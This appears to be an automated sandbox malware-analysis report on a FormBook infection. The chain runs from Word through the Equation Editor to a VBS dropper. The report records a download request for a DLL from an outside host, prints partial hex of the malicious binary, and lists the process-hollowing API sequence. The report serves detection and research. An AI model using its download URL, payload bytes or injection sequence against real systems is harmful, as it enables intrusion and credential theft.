                                              2024-09-27 08:57:08 UTC16384INData Raw: 06 39 e1 22 dd ed b8 ec fa 8b 9f 87 74 42 83 ad a7 3a 6e b0 5a 9f e8 60 a0 2c 57 07 ad d0 31 94 82 15 8a 3e d8 09 b3 a1 2e 55 81 cb 51 c8 fe 48 92 4b bb 3e 4d 35 8f dd e5 3e 33 bd 51 25 15 db c3 60 20 27 4d f3 9e 3b 8a 2b ba ff ff 21 0d 56 48 1c 36 fc 70 d1 46 ff 40 b6 51 54 95 d9 74 78 0f 12 4c a4 cd 08 53 55 00 b4 ce 41 22 86 02 de 5c a4 74 d8 a8 89 e3 bf b5 77 04 00 a7 0a 0e 6a 8d bd fa b6 02 e2 79 e5 c7 04 3c ba 38 ee 54 35 31 b1 72 20 f9 41 3e f4 69 12 c4 73 e8 e9 f3 78 28 a5 63 fc 92 4e 1e fb f1 a8 ab a8 b2 da 4c 0a 45 42 c1 64 88 0c 5a 37 1b 37 08 1a 33 2f 8d 19 d4 d5 f0 eb c0 83 4a 3f 6d b9 cc ab c7 2f a5 6a 3c e9 33 47 f3 d8 76 d9 cf 4d 40 e6 bd b9 7e a2 22 bf 9f 4a fe 84 e9 6f e1 ad 61 03 b2 90 8f 0a f1 fa d2 3d e1 8d 47 e4 45 d9 8c 28 71 57 50
                                              Data Ascii: 9"tB:nZ`,W1>.UQHK>M5>3Q%` 'M;+!VH6pF@QTtxLSUA"\twjy<8T51r A>isx(cNLEBdZ773/J?m/j<3GvM@~"Joa=GE(qWP


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.2249167185.18.213.204433584C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 08:57:09 UTC66OUTGET /kokorila/cgl-bin/DLLL.dll HTTP/1.1
                                              Host: dl.zerotheme.ir
                                              2024-09-27 08:57:09 UTC206INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: application/x-msdownload
                                              last-modified: Thu, 26 Sep 2024 04:42:14 GMT
                                              accept-ranges: bytes
                                              content-length: 15360
                                              date: Fri, 27 Sep 2024 08:57:09 GMT
                                              2024-09-27 08:57:09 UTC1162INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 f9 da 66 00 00 00 00 00 00 00 00 e0 00 2e 20 0b 01 30 00 00 34 00 00 00 38 00 00 00 00 00 00 2e 53 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf. 048.S `@ `
                                              2024-09-27 08:57:09 UTC14198INData Raw: 00 00 06 12 00 28 06 00 00 06 25 26 1f 60 28 10 00 00 06 fe 01 13 16 11 16 2c 10 1a 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 11 05 11 08 fe 01 13 17 11 17 2c 30 00 09 7b 01 00 00 04 11 08 28 08 00 00 06 25 26 1f 64 28 10 00 00 06 fe 03 13 18 11 18 2c 10 1d 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 00 04 11 04 1f 68 28 10 00 00 06 58 28 18 00 00 0a 25 26 13 09 04 11 04 1f 6c 28 10 00 00 06 58 28 18 00 00 0a 13 0a 1f 70 28 10 00 00 06 13 0b 09 7b 01 00 00 04 11 05 11 09 1f 74 28 10 00 00 06 1f 78 28 10 00 00 06 28 09 00 00 06 13 0c 05 2d 0d 11 0c 1f 7c 28 10 00 00 06 fe 01 2b 0a 20 80 00 00 00 28 10 00 00 06 13 19 11 19 2c 47 1d 45 01 00 00 00 f6 ff ff ff 00 20 84 00 00 00 28 10 00 00 06 13 0b 09 7b 01 00 00 04 20 88 00 00 00 28 10 00 00 06 11 09 20
                                              Data Ascii: (%&`(,Esz,0{(%&d(,Eszh(X(%&l(X(p({t(x((-|(+ (,GE ({ (


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:56:57
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13f280000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:2
                                              Start time:04:56:59
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:04:57:02
                                              Start date:27/09/2024
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
                                              Imagebase:0x450000
                                              File size:141'824 bytes
                                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:04:57:04
                                              Start date:27/09/2024
                                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                                              Imagebase:0xa80000
                                              File size:49'152 bytes
                                              MD5 hash:3E01AC27E853080CA5C92470DF3F738C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 21%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:04:57:09
                                              Start date:27/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                              Imagebase:0x20000
                                              File size:55'384 bytes
                                              MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:04:57:21
                                              Start date:27/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Non-executed Functions

                                                Function 00579718 Relevance: 21.6, Strings: 17, Instructions: 392COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0056F000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_56f000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: y$y$y$y$y$y$y$y$y$y$y$y$y1n$yN$yY$y\$y\
                                                • API String ID: 0-1649628219
                                                • Opcode ID: 48bc06a2e6a1c9d82b5de89cc9cc5c4e775dd96478d983fa0f86de395adcf2bf
                                                • Instruction ID: 98a7b27af87fecd57121f49a38937c7a13ecba67703ba66a7a48adb0dbd96ec3
                                                • Opcode Fuzzy Hash: 48bc06a2e6a1c9d82b5de89cc9cc5c4e775dd96478d983fa0f86de395adcf2bf
                                                • Instruction Fuzzy Hash: AAD1DB6144E3C4AFD3138B386CB99963FB45E53218B0A01DBD8D48F6B3E649091AC7B7

                                                Execution Graph

                                                Execution Coverage:21.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:17
                                                Total number of Limit Nodes:2
                                                execution_graph 4511 188e68 VirtualAllocEx 4512 188f1f 4511->4512 4503 1890b0 ResumeThread 4504 189138 4503->4504 4505 188d50 ReadProcessMemory 4506 188e0f 4505->4506 4507 188f70 4508 188fd9 4507->4508 4509 188fee WriteProcessMemory 4507->4509 4508->4509 4510 189050 4509->4510 4513 1888c0 4514 18894d CreateProcessW 4513->4514 4516 188ab4 4514->4516 4517 188c40 4518 188c9e 4517->4518 4519 188cb3 Wow64SetThreadContext 4517->4519 4518->4519 4520 188cfc 4519->4520

                                                Executed Functions

                                                Function 00182108 Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 52 182108-182133 53 18213a-1821c7 52->53 54 182135 52->54 57 1821c9-1821d0 53->57 58 18221f-182273 53->58 54->53 57->57 59 1821d2-1821d7 57->59 68 182276-1822c6 58->68 61 1821d9-1821e3 59->61 62 1821e6-18221d 59->62 61->62 62->68 72 1825d9-1825f4 call 181268 68->72 75 1825fa-182601 72->75 76 1822cb-1822d7 72->76 75->75 79 182603-18260a 75->79 77 1822d9 76->77 78 1822de-182333 call 181310 call 181340 76->78 77->78 85 182381-182387 78->85 86 182389-182409 85->86 87 182335-182350 85->87 96 18240b-182412 86->96 97 182444-182448 86->97 88 182352 87->88 89 182357-18237e 87->89 88->89 89->85 96->96 98 182414-18243e 96->98 99 18247a-18247e 97->99 100 18244a-182474 97->100 98->97 101 1824b0-1824b4 99->101 102 182480-1824aa 99->102 100->99 103 1824e6-1824ea 101->103 104 1824b6-1824e0 101->104 102->101 105 1824ec-1824f4 103->105 106 182534-1825a0 103->106 104->103 107 18252c-182532 105->107 112 1825a7-1825d6 106->112 107->106 108 1824f6-182529 107->108 108->107 112->72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!p
                                                • API String ID: 0-1147775804
                                                • Opcode ID: c5b505e7e8a1eeb1706267d6bca91261db06ebac81c6c10c36eaccc83a8567c7
                                                • Instruction ID: 86cdc2fa27492a2e183c480f0275e2fa089e021d9eb7d635b1244d5ef82ffc7e
                                                • Opcode Fuzzy Hash: c5b505e7e8a1eeb1706267d6bca91261db06ebac81c6c10c36eaccc83a8567c7
                                                • Instruction Fuzzy Hash: FB02D375A00218DFDB15DFA9C984E9DBBB2FF49300F1581A9E509AB232DB31E991DF10
                                                Function 00187020 Relevance: 1.4, Instructions: 1433COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 176 187020-187058 181 18705a-18705e 176->181 182 187061-187439 176->182 181->182 185 18743b 182->185 186 187440-1875ae call 186fc0 * 3 182->186 185->186 200 187618-1876ca call 186fc0 * 2 call 185bfc call 186fc0 186->200 201 1875b0-1875b7 186->201 216 1876fb-1877e5 call 186fc0 * 5 200->216 217 1876cc-1876d3 200->217 201->201 203 1875b9-1875be 201->203 205 1875d0-187612 203->205 206 1875c0-1875ca 203->206 205->200 206->205 234 1877ec-187831 call 186fc0 216->234 235 1877e7 216->235 217->217 219 1876d5-1876f0 217->219 219->216 239 1878b4-1878fb call 185c14 call 186fc0 234->239 240 187837-18783e 234->240 235->234 249 18792c-187957 call 186fc0 239->249 250 1878fd-187904 239->250 240->240 242 187840-187888 call 185c08 call 186fc0 240->242 254 18788a-1878a5 242->254 255 1878b0-1878b2 242->255 258 187959 249->258 259 18795e-187a28 call 186fc0 * 3 call 185c20 call 186fc0 249->259 250->250 253 187906-187921 250->253 253->249 254->255 255->249 258->259 273 187a59-187a75 259->273 274 187a2a-187a31 259->274 276 187aee-187c1b call 186fc0 * 5 call 185c38 273->276 277 187a77-187abc call 185c2c call 186fc0 273->277 274->274 275 187a33-187a4e 274->275 275->273 303 187c1d-187c52 call 186fc0 276->303 304 187c54-187c5e call 186fc0 276->304 288 187aed 277->288 289 187abe-187ac5 277->289 288->276 289->289 291 187ac7-187ae2 289->291 291->288 309 187c64-187c78 303->309 304->309 310 187c7e-187c85 309->310 311 187d21-187d5c call 186fc0 309->311 310->310 313 187c87-187d20 call 186fc0 * 4 call 185c38 310->313 317 187d8d-187dde call 185c44 call 186fc0 311->317 318 187d5e-187d65 311->318 313->311 331 187e0f-187ea4 call 186fc0 * 3 317->331 332 187de0-187de7 317->332 318->318 321 187d67-187d82 318->321 321->317 346 18817e-1881f3 call 186fc0 * 2 331->346 332->332 335 187de9-187e04 332->335 335->331 351 187ea9-187fd1 call 186fc0 * 4 346->351 352 1881f9-188200 346->352 379 188121-188178 call 186fc0 * 2 351->379 380 187fd7-1880b4 call 186fc0 * 2 call 186f78 call 186fc0 call 185c44 351->380 352->352 354 188202-1882c7 call 186fc0 * 2 call 185c44 call 186fc0 352->354 372 1882f8-188357 call 186fc0 354->372 373 1882c9-1882d0 354->373 386 188359-188360 372->386 387 18836b-1883a2 call 186fc0 372->387 373->373 375 1882d2-1882ed 373->375 375->372 379->346 412 1880b9-1880ef call 186fc0 380->412 386->386 391 188362-188365 386->391 397 1883a9-1883e7 call 186fc0 387->397 398 1883a4 387->398 391->387 407 1883e9-1883f6 call 185c50 397->407 408 18845d-1884a4 call 186ff4 call 186fc0 397->408 398->397 414 1883fb-188431 call 186fc0 407->414 425 1884d5-1884db call 187000 408->425 426 1884a6-1884ad 408->426 423 188120 412->423 424 1880f1-1880f8 412->424 421 188459-18845b 414->421 422 188433-18844e 414->422 421->425 422->421 423->379 424->424 428 1880fa-188115 424->428 431 1884e0-188516 call 186fc0 425->431 426->426 429 1884af-1884ca 426->429 428->423 429->425 438 188518-18851f 431->438 439 188547-188605 call 186fc0 431->439 438->438 442 188521-18853c 438->442 442->439
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d8d18b5976bc39ac8da2c95d23bf03fa17eb285549429a23d1b92c2cae817a3
                                                • Instruction ID: b4bce30e8b23ed29a1bb676a9b4aaeb0045c5e3d23129fe30da577ae05da73cf
                                                • Opcode Fuzzy Hash: 7d8d18b5976bc39ac8da2c95d23bf03fa17eb285549429a23d1b92c2cae817a3
                                                • Instruction Fuzzy Hash: BFB2AC74A052288FDB65EF68D894BDDBBB5AF49300F1085EAE50CA7291DB349F84CF50
                                                Function 00186721 Relevance: .6, Instructions: 567COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 448 186721-186764 449 18676b-186848 448->449 450 186766 448->450 452 18685f-186863 449->452 450->449 453 18684a-18685c 452->453 454 186865-18686c 452->454 453->452 454->454 455 18686e-186873 454->455 457 186885-1868b2 455->457 458 186875-18687f 455->458 461 1868b8-1868bf 457->461 462 186d5a-186d61 457->462 458->457 461->461 465 1868c1-18698f 461->465 463 186e91-186e98 462->463 464 186d67-186d6e 462->464 466 186e9a-186ea1 463->466 467 186ec7-186efe 463->467 468 186dce-186e2d call 181e6c 464->468 469 186d70-186d7a 464->469 505 1869c6-1869d2 465->505 466->466 470 186ea3-186ec4 466->470 484 186f0b-186f0e 467->484 485 186f00-186f02 467->485 496 186e33-186e5a 468->496 471 186dbb-186dc8 469->471 472 186d7c-186d83 469->472 471->468 472->472 476 186d85-186db9 472->476 476->468 490 186f10 484->490 491 186f15-186f5f 484->491 487 186f09 485->487 488 186f04 485->488 487->491 488->487 490->491 500 186e5c-186e63 496->500 501 186e7e-186e84 496->501 500->500 503 186e65-186e78 500->503 501->496 504 186e86-186e8b 501->504 503->501 504->463 506 186991-18699d 505->506 507 1869d4-1869d8 505->507 510 18699f 506->510 511 1869a4-1869b0 506->511 508 1869da-1869e1 507->508 509 186a0e-186a29 507->509 508->508 514 1869e3-186a08 508->514 518 186a99-186ab4 509->518 519 186a2b-186a32 509->519 510->511 512 1869b2-1869b9 511->512 513 1869c3 511->513 512->512 515 1869bb-1869c1 512->515 513->505 514->509 515->507 526 186ab9-186b62 518->526 519->519 520 186a34-186a3e 519->520 521 186a40-186a47 520->521 522 186a86-186a93 520->522 521->521 525 186a49-186a84 521->525 522->518 525->518 536 186bd1-186c0b 526->536 538 186c0d 536->538 539 186c1f-186d54 536->539 540 186c13-186c19 538->540 541 186b64-186bce 538->541 539->462 540->539 540->541 541->536
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01ef9bc24e5b1225e7dbd4f4d57684b15a77d2dd90622b1df814a27efeca27dc
                                                • Instruction ID: 38ed2278f1746b7661b50a252702d6bd3b87a027285d69d570e80e5e75b20c3d
                                                • Opcode Fuzzy Hash: 01ef9bc24e5b1225e7dbd4f4d57684b15a77d2dd90622b1df814a27efeca27dc
                                                • Instruction Fuzzy Hash: DF429474A012188FDB64DF69D994B9DBBF1BF49300F1181EAE909A73A1DB309E85CF50
                                                Function 001828E0 Relevance: .5, Instructions: 514COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22ee887541ab07b21c5e82c7d1e7e4a3a6f333e18da61addc1f6b8456f799636
                                                • Instruction ID: 63d84b5dfda9de953663f8bf5387f00bcefeb260cf4946b2f3696455628424db
                                                • Opcode Fuzzy Hash: 22ee887541ab07b21c5e82c7d1e7e4a3a6f333e18da61addc1f6b8456f799636
                                                • Instruction Fuzzy Hash: 7232A374E04229CFDB65DF69DD44B9DBBB2BB59300F1091AAE809A76A0DB305E85CF10
                                                Function 001888B6 Relevance: 1.7, APIs: 1, Instructions: 238processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1888b6-18894b 1 18894d-18895f 0->1 2 188962-188970 0->2 1->2 3 188972-188984 2->3 4 188987-1889c3 2->4 3->4 5 1889c5-1889d4 4->5 6 1889d7-188ab2 CreateProcessW 4->6 5->6 10 188abb-188b84 6->10 11 188ab4-188aba 6->11 20 188bba-188bc5 10->20 21 188b86-188baf 10->21 11->10 24 188bc6 20->24 21->20 24->24
                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00188A9F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4aad0d33fca0b68c7b747bf72cfd20e9c3e630f10d587b4cdc912f55991b24a1
                                                • Instruction ID: c65f8cbedd52a8c5057284fe4d9b9aadd99197d564ecb95bdeaa5169310ea7e0
                                                • Opcode Fuzzy Hash: 4aad0d33fca0b68c7b747bf72cfd20e9c3e630f10d587b4cdc912f55991b24a1
                                                • Instruction Fuzzy Hash: 3381D0B4D002698FDF25CFA5C840BEDBBB1AF4A304F0491AAE549B7260DB709A85DF54
                                                Function 001888C0 Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 26 1888c0-18894b 27 18894d-18895f 26->27 28 188962-188970 26->28 27->28 29 188972-188984 28->29 30 188987-1889c3 28->30 29->30 31 1889c5-1889d4 30->31 32 1889d7-188ab2 CreateProcessW 30->32 31->32 36 188abb-188b84 32->36 37 188ab4-188aba 32->37 46 188bba-188bc5 36->46 47 188b86-188baf 36->47 37->36 50 188bc6 46->50 47->46 50->50
                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00188A9F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 0679d2e9a441590388f3db04352e2a3c25434937d8c0eec4a01ff2ba7580425f
                                                • Instruction ID: 2b820b6e21d8ee6f8aef19b3dcfa33027c48544392bb266c31026361e8fd7776
                                                • Opcode Fuzzy Hash: 0679d2e9a441590388f3db04352e2a3c25434937d8c0eec4a01ff2ba7580425f
                                                • Instruction Fuzzy Hash: F381D0B4D0022DDFDF25CFA5C840BDDBBB1AB4A304F0491AAE549B7250DB709A89DF94
                                                Function 00188F69 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 115 188f69-188fd7 116 188fd9-188feb 115->116 117 188fee-18904e WriteProcessMemory 115->117 116->117 118 189050-189056 117->118 119 189057-189095 117->119 118->119
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0018903E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 1ddc1f23d1b5507149332310cbb9050574bd7f942b1c1ea044ae3d87b16d3ef3
                                                • Instruction ID: a59fb84a69b00d88b8f469e8b9f5b6d0fffb1a2d4876387f85ab8a7d7e043ba8
                                                • Opcode Fuzzy Hash: 1ddc1f23d1b5507149332310cbb9050574bd7f942b1c1ea044ae3d87b16d3ef3
                                                • Instruction Fuzzy Hash: 1E419CB5D052589FCF10CFA9D984ADEFBF1BB59310F24902AE818BB210D374AA45CF64
                                                Function 00188F70 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 122 188f70-188fd7 123 188fd9-188feb 122->123 124 188fee-18904e WriteProcessMemory 122->124 123->124 125 189050-189056 124->125 126 189057-189095 124->126 125->126
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0018903E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 3941c16e4a6b422d8f08486d47e904e6ef1cd179dc2c0032755972e57106dd41
                                                • Instruction ID: a3c9db3832965caad3fd82faf9eb0e758272f923aafd3ea2ae1497db021cba92
                                                • Opcode Fuzzy Hash: 3941c16e4a6b422d8f08486d47e904e6ef1cd179dc2c0032755972e57106dd41
                                                • Instruction Fuzzy Hash: 334169B5D002589FCF10CFA9D984ADEFBF5BB49314F24902AE918BB210D375AA45CF64
                                                Function 00188D48 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 188d48-188e0d ReadProcessMemory 131 188e0f-188e15 129->131 132 188e16-188e54 129->132 131->132
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00188DFD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 3767bc356ae3bec7cff0ea2cad5caddadd06f814856737cff42505796102ef99
                                                • Instruction ID: cc649f11ba2f858996112393d05b452b15ebc37ab9203f3eb67d66fd4c1bb051
                                                • Opcode Fuzzy Hash: 3767bc356ae3bec7cff0ea2cad5caddadd06f814856737cff42505796102ef99
                                                • Instruction Fuzzy Hash: BC4198B9D01258DFCF10CFAAD984ADEFBB5BB59310F10902AE814B7210D334AA45CF65
                                                Function 00188D50 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 135 188d50-188e0d ReadProcessMemory 136 188e0f-188e15 135->136 137 188e16-188e54 135->137 136->137
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00188DFD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: a0f7326fbe16f93696311698a6c9863a9f97a10414d896687be3ff89e7e2780a
                                                • Instruction ID: dd5d05920d387998e48f195e2633ef183e2539cd436b6060b911ed379e905e94
                                                • Opcode Fuzzy Hash: a0f7326fbe16f93696311698a6c9863a9f97a10414d896687be3ff89e7e2780a
                                                • Instruction Fuzzy Hash: 613178B9D00258DFCF10CFAAD984ADEFBB1BB59310F10902AE814B7210D335AA45CF65
                                                Function 00188E61 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 140 188e61-188e66 141 188e68-188f1d VirtualAllocEx 140->141 142 188f1f-188f25 141->142 143 188f26-188f5c 141->143 142->143
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00188F0D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4885a1551c145cac8bbf2bcc2e4e190f129bfa1bdef4531c3003942b78a9e991
